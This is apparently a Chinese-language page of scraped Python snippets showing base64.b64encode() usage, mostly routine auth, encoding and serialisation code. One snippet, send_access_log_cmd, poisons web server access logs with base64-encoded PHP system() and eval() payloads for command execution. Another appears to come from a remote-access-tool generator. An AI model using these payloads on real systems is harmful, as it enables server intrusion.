我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用base64.b64encode()。
def copy_from_host(module): compress = module.params.get('compress') src = module.params.get('src') if not os.path.exists(src): module.fail_json(msg="file not found: {}".format(src)) if not os.access(src, os.R_OK): module.fail_json(msg="file is not readable: {}".format(src)) mode = oct(os.stat(src).st_mode & 0o777) with open(src, 'rb') as f: raw_data = f.read() sha1 = hashlib.sha1(raw_data).hexdigest() data = zlib.compress(raw_data) if compress else raw_data module.exit_json(content=base64.b64encode(data), sha1=sha1, mode=mode, source=src)
def save(self, buffer): path = urljoin(self.prefix, buffer.path) file_obj = buffer.get_rewound_file() md5_base64 = base64.b64encode(buffer.md5).decode('ascii') self.objects.insert( media_body=http.MediaIoBaseUpload( file_obj, 'application/octet-stream' ), name=path, body={ 'md5Hash': md5_base64, 'metadata': { 'count': str(buffer.count), }, }, bucket=self.bucket, ).execute()
def get_encryption(): return ''' import base64 from Crypto import Random from Crypto.Cipher import AES abbrev = '{2}' {0} = base64.b64decode('{1}') def encrypt(raw): iv = Random.new().read( AES.block_size ) cipher = AES.new({0}, AES.MODE_CFB, iv ) return (base64.b64encode( iv + cipher.encrypt( raw ) ) ) def decrypt(enc): enc = base64.b64decode(enc) iv = enc[:16] cipher = AES.new({0}, AES.MODE_CFB, iv ) return cipher.decrypt( enc[16:] ) '''.format(st_obf[0],aes_encoded,aes_abbrev) ################################################################################ # st_protocol.py stitch_gen variables # ################################################################################
def encode_public_key(self): """ Based on spotnab, this is the gzipped version of the key with base64 applied to it. We encode it as such and return it. """ fileobj = StringIO() with GzipFile(fileobj=fileobj, mode="wb") as f: try: f.write(self.public_pem()) except TypeError: # It wasn't initialized yet return None return b64encode(fileobj.getvalue())
def handleServerCall(self, payload): self.logger.info("Handling server callback with payload {0}".format(payload)) payloadDict = json.loads(payload) if "command" in payloadDict: command = payloadDict["command"] self.logger.info("Received command: {0}".format(command)) if command == "blink": self.logger.info("BLINK!!!") elif command == "reboot": self.logger.info("REBOOT!!!") elif command == "photo": self.logger.info("PHOTO!!!") photoFile = "/home/pi/puszcz.jpg" with open(photoFile, mode='rb') as file: photoData = file.read() base64data = base64.b64encode(photoData) self.service.sendMessage(json.dumps({'image':base64data, 'type':'jpg'})) else: self.logger.info("Command '{0}' unknown".format(command))
def encode_primitive(self, validator, value): if validator in self.alias_validators: self.alias_validators[validator](value) if isinstance(validator, bv.Void): return None elif isinstance(validator, bv.Timestamp): return _strftime(value, validator.format) elif isinstance(validator, bv.Bytes): if self.for_msgpack: return value else: return base64.b64encode(value).decode('ascii') elif isinstance(validator, bv.Integer) \ and isinstance(value, bool): # bool is sub-class of int so it passes Integer validation, # but we want the bool to be encoded as ``0`` or ``1``, rather # than ``False`` or ``True``, respectively return int(value) else: return value
def main(args): global HTTPD, CREDENTIALS if args: load_settings(args[0]) print("Starting server") server_address = (LISTENIP, LISTENPORT) if CREDENTIALS: CREDENTIALS = base64.b64encode(bytes(CREDENTIALS, "utf-8")) Handler = AuthHandler else: Handler = RequestHandler if not SSL_CERTIFICATE: HTTPD = HTTPServer(server_address, Handler) else: HTTPD = socketserver.TCPServer(server_address, Handler) HTTPD.socket = ssl.wrap_socket(HTTPD.socket, certfile=SSL_CERTIFICATE, keyfile=SSL_KEY, server_side=True) print('Listening on: %s://%s:%i' % ('https' if SSL_CERTIFICATE else 'http', LISTENIP, LISTENPORT)) if BASEPATH: os.chdir(BASEPATH) HTTPD.serve_forever()
def vPrint(actor, sent, otherActor, toPrint, base64encode=True): """does verbose printing of stuff, with cutoffs for length and base 64 encoding """ if VERBOSE: label = "%s -> %s" % (actor, otherActor) if not sent: label = "%s <- %s" % (actor, otherActor) if len(label) < 12: label = label + (" " * (12 - len(label))) if type(toPrint) == str: if base64encode: toPrint = b64encode(toPrint) if len(toPrint) > 100: toPrint = toPrint[:100] + "..." elif type(toPrint) == list: if base64encode: toPrint = [b64encode(x) if len(x) < 100 else b64encode(x[:100]) + '...' for x in toPrint] else: toPrint = [x if len(x) < 100 else x[:100] + '...' for x in toPrint] print "%s: <%s>" % (label, toPrint)
def _http_headers(self): """Return dictionary of http headers necessary for making an http connection to the endpoint of this Connection. :return: Dictionary of headers """ if not self.usertag: return {} creds = u'{}:{}'.format( self.usertag, self.password or '' ) token = base64.b64encode(creds.encode()) return { 'Authorization': 'Basic {}'.format(token.decode()) }
def __init__(self, **kwargs): # these fields are required in every feed descriptor self.required = ["name", "display_name", "summary", "tech_data", "provider_url"] self.optional = ["category", "icon", "version", "icon_small"] self.noemptystrings = ["name", "display_name", "summary", "tech_data", "category"] self.data = kwargs # if they are present, set the icon fields of the data to hold # the base64 encoded file data from their path for icon_field in ["icon", "icon_small"]: if icon_field in self.data and os.path.exists(self.data[icon_field]): icon_path = self.data.pop(icon_field) try: self.data[icon_field] = base64.b64encode(open(icon_path, "rb").read()) except Exception, err: raise CbIconError("Unknown error reading/encoding icon data: %s" % err)
def send_access_log_cmd(cmd,host,keyword): path = "" if("_PHP" in keyword): keyword = keyword[:-4] if(" " in cmd): b64cmd = base64.b64encode(cmd) path = "/<?php eval(base64_decode('%s'));?>" %(b64cmd) else: path = "/<?php %s?>" %(cmd) else: b64cmd = base64.b64encode(cmd) path = "/<?php system(base64_decode('%s'));?>" %(b64cmd) s = NoURLEncodingSession() url = "%s/%s" %(host,path) if("GET" in keyword): s.get(url, headers=gen_headers) else: s.head(url, headers=gen_headers)
def sensu_event_resolve(message): API_URL = settings.SENSU_API_URL + '/resolve' userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii") headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Authorization' : 'Basic %s' % userAndPass } try: client_name, check_name = message['entity'].split(':') post_params = {"client": client_name, "check": check_name} request = http.request('POST', API_URL, body=json.dumps(post_params), headers=headers) response = request.status if response == 202: #reader = codecs.getreader('utf-8') #data = json.load(reader(request)) request.release_conn() else: logger.error('response: %s' % str(response)) except: logger.error("sensu_event_resolve failed resolving entity: %s" % message['entity']) raise
def sensu_client_delete(message): API_URL = settings.SENSU_API_URL + '/clients/' + message['client'] userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii") headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Authorization' : 'Basic %s' % userAndPass } try: request = http.request('DELETE', API_URL, headers=headers) response = request.status if response == 202: request.release_conn() return True else: logger.error("sensu_client_delete api request failed: %s" % str(response)) return False except: logger.error("sensu_client_delete failed deleting client: %s" % message['client']) raise
def sensu_result_delete(message): API_URL = settings.SENSU_API_URL + '/results/' + message['client'] + '/' + message['check'] userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii") headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Authorization' : 'Basic %s' % userAndPass } try: request = http.request('DELETE', API_URL, headers=headers) response = request.status if response == 204: request.release_conn() return True else: logger.error("sensu_result_delete api request failed: %s" % str(response)) return False except: logger.error("sensu_result_delete failed deleting client: %s check: %s" % (message['client'], message['check'])) raise
def __init__(self): self.priority = 1 self.language = ['en'] self.domains = ['ororo.tv'] self.base_link = 'https://ororo.tv' self.moviesearch_link = '/api/v2/movies' self.tvsearch_link = '/api/v2/shows' self.movie_link = '/api/v2/movies/%s' self.show_link = '/api/v2/shows/%s' self.episode_link = '/api/v2/episodes/%s' self.user = control.setting('ororo.user') self.password = control.setting('ororo.pass') self.headers = { 'Authorization': 'Basic %s' % base64.b64encode('%s:%s' % (self.user, self.password)), 'User-Agent': 'Exodus for Kodi' }
def _to_json(self, strip, to_serialize=None): """Utility function that creates JSON repr. of a credentials object. Over-ride is needed since PKCS#12 keys will not in general be JSON serializable. Args: strip: array, An array of names of members to exclude from the JSON. to_serialize: dict, (Optional) The properties for this object that will be serialized. This allows callers to modify before serializing. Returns: string, a JSON representation of this instance, suitable to pass to from_json(). """ if to_serialize is None: to_serialize = copy.copy(self.__dict__) pkcs12_val = to_serialize.get(_PKCS12_KEY) if pkcs12_val is not None: to_serialize[_PKCS12_KEY] = base64.b64encode(pkcs12_val) return super(ServiceAccountCredentials, self)._to_json( strip, to_serialize=to_serialize)
def get_console_log(session, arg_dict): try: raw_dom_id = arg_dict['dom_id'] except KeyError: raise dom0_pluginlib.PluginError("Missing dom_id") try: dom_id = int(raw_dom_id) except ValueError: raise dom0_pluginlib.PluginError("Invalid dom_id") logfile = open(CONSOLE_LOG_FILE_PATTERN % dom_id, 'rb') try: try: log_content = _last_bytes(logfile) except IOError, e: # noqa msg = "Error reading console: %s" % e logging.debug(msg) raise dom0_pluginlib.PluginError(msg) finally: logfile.close() return base64.b64encode(zlib.compress(log_content))
def test_inject_file_with_old_agent(self): tmp_arg_dict = FAKE_ARG_DICT request_id = tmp_arg_dict["id"] b64_path = tmp_arg_dict["b64_path"] b64_file = tmp_arg_dict["b64_contents"] raw_path = base64.b64decode(b64_path) raw_file = base64.b64decode(b64_file) new_b64 = base64.b64encode("%s,%s" % (raw_path, raw_file)) self.mock_patch_object(self.agent, '_get_agent_features', 'injectfile') tmp_arg_dict["value"] = json.dumps({"name": "injectfile", "value": new_b64}) tmp_arg_dict["path"] = "data/host/%s" % request_id self.agent.inject_file(self.agent, FAKE_ARG_DICT) self.agent._wait_for_agent.assert_called_once() self.agent.xenstore.write_record.assert_called_with(self.agent, tmp_arg_dict) self.agent._get_agent_features.assert_called_once()
def client_udp_pre_encrypt(self, buf): if self.user_key is None: if b':' in to_bytes(self.server_info.protocol_param): try: items = to_bytes(self.server_info.protocol_param).split(':') self.user_key = self.hashfunc(items[1]).digest() self.user_id = struct.pack('<I', int(items[0])) except: pass if self.user_key is None: self.user_id = os.urandom(4) self.user_key = self.server_info.key authdata = os.urandom(3) mac_key = self.server_info.key md5data = hmac.new(mac_key, authdata, self.hashfunc).digest() uid = struct.unpack('<I', self.user_id)[0] ^ struct.unpack('<I', md5data[:4])[0] uid = struct.pack('<I', uid) rand_len = self.udp_rnd_data_len(md5data, self.random_client) encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4') out_buf = encryptor.encrypt(buf) buf = out_buf + os.urandom(rand_len) + authdata + uid return buf + hmac.new(self.user_key, buf, self.hashfunc).digest()[:1]
def server_udp_pre_encrypt(self, buf, uid): if uid in self.server_info.users: user_key = self.server_info.users[uid] else: uid = None if not self.server_info.users: user_key = self.server_info.key else: user_key = self.server_info.recv_iv authdata = os.urandom(7) mac_key = self.server_info.key md5data = hmac.new(mac_key, authdata, self.hashfunc).digest() rand_len = self.udp_rnd_data_len(md5data, self.random_server) encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4') out_buf = encryptor.encrypt(buf) buf = out_buf + os.urandom(rand_len) + authdata return buf + hmac.new(user_key, buf, self.hashfunc).digest()[:1]
def server_udp_post_decrypt(self, buf): mac_key = self.server_info.key md5data = hmac.new(mac_key, buf[-8:-5], self.hashfunc).digest() uid = struct.unpack('<I', buf[-5:-1])[0] ^ struct.unpack('<I', md5data[:4])[0] uid = struct.pack('<I', uid) if uid in self.server_info.users: user_key = self.server_info.users[uid] else: uid = None if not self.server_info.users: user_key = self.server_info.key else: user_key = self.server_info.recv_iv if hmac.new(user_key, buf[:-1], self.hashfunc).digest()[:1] != buf[-1:]: return (b'', None) rand_len = self.udp_rnd_data_len(md5data, self.random_client) encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4') out_buf = encryptor.decrypt(buf[:-8 - rand_len]) return (out_buf, uid)
def handshake_hmac_get(handshake_key, prefix, server_cookie, client_cookie): ''' Return HMAC(handshake_key, prefix | server_cookie | client_cookie), base-64 encoded. ''' hmac = b64encode(get_hmac(handshake_key, prefix, server_cookie + client_cookie)) assert PrivCountProtocol.handshake_hmac_verify(hmac, handshake_key, prefix, server_cookie, client_cookie) return hmac
def get_ssl_ca_settings(): """ Get the Certificate Authority settings required to use the CA :returns: Dictionary with https_keystone and ca_cert set """ ca_data = {} https_service_endpoints = config('https-service-endpoints') if (https_service_endpoints and bool_from_string(https_service_endpoints)): # Pass CA cert as client will need it to # verify https connections ca = get_ca(user=SSH_USER) ca_bundle = ca.get_ca_bundle() ca_data['https_keystone'] = 'True' ca_data['ca_cert'] = b64encode(ca_bundle) return ca_data
def get_disqus_sso_payload(user): """Return remote_auth_s3 and api_key for user.""" DISQUS_PUBLIC_KEY = current_app.config.get('DISQUS_PUBLIC_KEY') DISQUS_SECRET_KEY = current_app.config.get('DISQUS_SECRET_KEY') if DISQUS_PUBLIC_KEY and DISQUS_SECRET_KEY: if user: data = simplejson.dumps({ 'id': user.id, 'username': user.name, 'email': user.email_addr, }) else: data = simplejson.dumps({}) # encode the data to base64 message = base64.b64encode(data) # generate a timestamp for signing the message timestamp = int(time.time()) # generate our hmac signature sig = hmac.HMAC(DISQUS_SECRET_KEY, '%s %s' % (message, timestamp), hashlib.sha1).hexdigest() return message, timestamp, sig, DISQUS_PUBLIC_KEY else: return None, None, None, None
def generate_md5_file(md5_check_fn, scene_list): md5_check = open(md5_check_fn, 'wb') for scene in scene_list: ply_file = scene + '.ply' log_file = scene + '.log' if os.path.isfile(ply_file): md5_ply_file = generate_file_md5(ply_file, blocksize=2**20) else: md5_ply_file = '' if os.path.isfile(log_file): md5_log_file = generate_file_md5(log_file, blocksize=2**20) else: md5_log_file = '' content_md5_log = base64.b64encode(md5_log_file) content_md5_ply = base64.b64encode(md5_ply_file) print('md5_ply_file: ', ply_file, content_md5_ply) print('md5_log_file: ',log_file, content_md5_log) md5_check.write("%s###%s\n" % (ply_file, content_md5_ply.decode('UTF-8'))) md5_check.write("%s###%s\n" % (log_file, content_md5_log.decode('UTF-8'))) md5_check.close()
def _tag(value): if isinstance(value, tuple): return {' t': [_tag(x) for x in value]} elif isinstance(value, uuid.UUID): return {' u': value.hex} elif isinstance(value, bytes): return {' b': b64encode(value).decode('ascii')} elif callable(getattr(value, '__html__', None)): return {' m': text_type(value.__html__())} elif isinstance(value, list): return [_tag(x) for x in value] elif isinstance(value, datetime): return {' d': http_date(value)} elif isinstance(value, dict): return dict((k, _tag(v)) for k, v in iteritems(value)) elif isinstance(value, str): try: return text_type(value) except UnicodeError: from flask.debughelpers import UnexpectedUnicodeError raise UnexpectedUnicodeError(u'A byte string with ' u'non-ASCII data was passed to the session system ' u'which can only store unicode strings. Consider ' u'base64 encoding your string (String was %r)' % value) return value
def html(self): """ Returns :attr:`self.file_obj` as an <img> tag with the src set to a data::URI. """ if not self.file_obj: return u"" self.file_obj.seek(0) # Need to encode base64 to create a data URI encoded = base64.b64encode(self.file_obj.read()) data_uri = "data:{mimetype};base64,{encoded}".format( mimetype=self.mimetype, encoded=encoded.decode('utf-8')) link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1]) if self.original_file: link = "%s/%s" % ( self.linkpath, os.path.split(self.original_file.name)[1]) if self.thumbnail: return self.html_icon_template.format( link=link, src=data_uri, icon=self.thumbnail, mimetype=self.mimetype) return self.html_template.format( link=link, src=data_uri, mimetype=self.mimetype)
def add(self, msg_text, to=None): current_time = int(time.time()) if to is None: message = {"msg": msg_text, "time": current_time} else: team_pk = Team(name=to)['crypt_pk'] encrypted_msg = pysodium.crypto_box_seal(msg_text.encode("utf-8"), team_pk) encoded_msg = b64encode(encrypted_msg) message = {"msg": encoded_msg.decode("utf-8"), "to": to, "time": current_time} self.append(message) self.save() dest = message["to"] if "to" in message else "all" SubRepo.push(commit_message='Added news to %s' % dest, merge_request=False)
def set_conf(profile, username, password, hesperides_endpoint, response_format): basic_auth = base64.b64encode(str.encode('%s:%s' % (username, password))).decode('UTF-8') config = {'endpoint': hesperides_endpoint, 'format': response_format} credentials = {'username': username, 'auth': basic_auth} config_writer = ConfigFileWriter() config_writer.update_config(profile, config, False) credentials_writer = ConfigFileWriter() credentials_writer.update_credentials(profile, credentials, False) profile_writer = ConfigFileWriter() config_writer.update_config('config', {}, False)
def encrypt(raw, aes_key=secret): iv = Random.new().read( AES.block_size ) cipher = AES.new(aes_key, AES.MODE_CFB, iv ) return (base64.b64encode( iv + cipher.encrypt( raw ) ) )
def login(cpf, password): result = session.post('https://www.meualelo.com.br/meualelo.services/rest/login/authenticate', json={ 'cpf': cpf, 'pwd': base64.b64encode(password), 'captchaResponse': '', }) if result.status_code != 200: raise WebApiFailure()
def headers(self): """Get the headers for the service requests.""" encoding = 'utf8' headers = super().headers token = b64encode(bytes('{}:{}'.format( self.username, self.password ), encoding)) headers['Authorization'] = 'Basic {}'.format(str(token, encoding)) return headers
def submit_sample(self, filepath, filename, tags=['JAMIE_Import', 'TheHive_Import']): """ Uploads a new sample to VMRay api. Filename gets sent base64 encoded. :param filepath: path to sample :type filepath: str :param filename: filename of the original file :type filename: str :param tags: List of tags to apply to the sample :type tags: list(str) :returns: Dictionary of results :rtype: dict """ apiurl = '/rest/sample/submit?sample_file' params = {'sample_filename_b64enc': base64.b64encode(filename.encode('utf-8')), 'reanalyze': self.reanalyze} if tags: params['tags'] = ','.join(tags) if os.path.isfile(filepath): res = self.session.post(url=self.url + apiurl, files=[('sample_file', open(filepath, mode='rb'))], params=params) if res.status_code == 200: return json.loads(res.text) else: raise BadResponseError('Response from VMRay was not HTTP 200.' ' Responsecode: {}; Text: {}'.format(res.status_code, res.text)) else: raise SampleFileNotFoundError('Given sample file was not found.')
def encrypt(pubkey, password): """Encrypt password using given RSA public key and encode it with base64. The encrypted password can only be decrypted by someone with the private key (in this case, only Travis). """ key = load_key(pubkey) encrypted_password = key.encrypt(password, PKCS1v15()) return base64.b64encode(encrypted_password)
def encode_private_key(self): """ Based on spotnab, this is the gzipped version of the key with base64 applied to it. We encode it as such and return it. """ fileobj = StringIO() with GzipFile(fileobj=fileobj, mode="wb") as f: try: f.write(self.private_pem()) except TypeError: # It wasn't initialized yet return None return b64encode(fileobj.getvalue())
def encrypt(raw): raw = pad(raw) iv = Random.new().read(AES.block_size) cipher = AES.new(KEY, AES.MODE_CBC, iv) return base64.b64encode( iv + cipher.encrypt(raw) )
def encrypt(plaintext): return base64.b64encode(kms.encrypt( KeyId=KMS_KEY_ID, Plaintext=plaintext)['CiphertextBlob'])
def _b64_encode_bytes(b): return base64.b64encode(b).decode("ascii")
def encrypt(text): """text (string)""" aes = AES.new(settings.CRYPT_KEY, AES.MODE_CFB, settings.CRYPT_IV) return base64.b64encode(aes.encrypt(text.encode())).decode()
def _FieldToJsonObject(self, field, value): """Converts field value according to Proto3 JSON Specification.""" if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE: return self._MessageToJsonObject(value) elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM: enum_value = field.enum_type.values_by_number.get(value, None) if enum_value is not None: return enum_value.name else: raise SerializeToJsonError('Enum field contains an integer value ' 'which can not mapped to an enum value.') elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING: if field.type == descriptor.FieldDescriptor.TYPE_BYTES: # Use base64 Data encoding for bytes return base64.b64encode(value).decode('utf-8') else: return value elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL: return bool(value) elif field.cpp_type in _INT64_TYPES: return str(value) elif field.cpp_type in _FLOAT_TYPES: if math.isinf(value): if value < 0.0: return _NEG_INFINITY else: return _INFINITY if math.isnan(value): return _NAN return value
def generate_cookie(name, securekey): #print (">> generate cookie for %s" % name) content = { 'name':name, 'login-time': time.asctime() } text = json.dumps(content) part1 = base64.b64encode(text.encode('ascii')) part2 = hashlib.md5( (text+securekey).encode('ascii') ).hexdigest() # part1 is binary(ascii) and part2 is str(utf-8) cookie = str(part1, encoding='utf-8') +"."+ part2 #print ("cookie : %s" % cookie) return cookie
def generate_auth_token(self, expiration = 3600): s = Serializer(app.config['SECRET_KEY'], expires_in = expiration) str = s.dumps({'id': self.id}) return b64encode(str).decode('utf-8')
def get_image_as_base64(filename): with open(filename, 'rb') as fp: content = fp.read() return base64.b64encode(content).decode('ascii')
def _temporary_keychain(): """ This function creates a temporary Mac keychain that we can use to work with credentials. This keychain uses a one-time password and a temporary file to store the data. We expect to have one keychain per socket. The returned SecKeychainRef must be freed by the caller, including calling SecKeychainDelete. Returns a tuple of the SecKeychainRef and the path to the temporary directory that contains it. """ # Unfortunately, SecKeychainCreate requires a path to a keychain. This # means we cannot use mkstemp to use a generic temporary file. Instead, # we're going to create a temporary directory and a filename to use there. # This filename will be 8 random bytes expanded into base64. We also need # some random bytes to password-protect the keychain we're creating, so we # ask for 40 random bytes. random_bytes = os.urandom(40) filename = base64.b64encode(random_bytes[:8]).decode('utf-8') password = base64.b64encode(random_bytes[8:]) # Must be valid UTF-8 tempdirectory = tempfile.mkdtemp() keychain_path = os.path.join(tempdirectory, filename).encode('utf-8') # We now want to create the keychain itself. keychain = Security.SecKeychainRef() status = Security.SecKeychainCreate( keychain_path, len(password), password, False, None, ctypes.byref(keychain) ) _assert_no_error(status) # Having created the keychain, we want to pass it off to the caller. return keychain, tempdirectory
def read_file(filename): filename_path = os.path.join('/etc/ceph', filename) if not os.path.exists(filename_path): json_exit("file not found: {}".format(filename_path), failed=True) if not os.access(filename_path, os.R_OK): json_exit("file not readable: {}".format(filename_path), failed=True) with open(filename_path, 'rb') as f: raw_data = f.read() return {'content': base64.b64encode(zlib.compress(raw_data)), 'sha1': hashlib.sha1(raw_data).hexdigest(), 'filename': filename}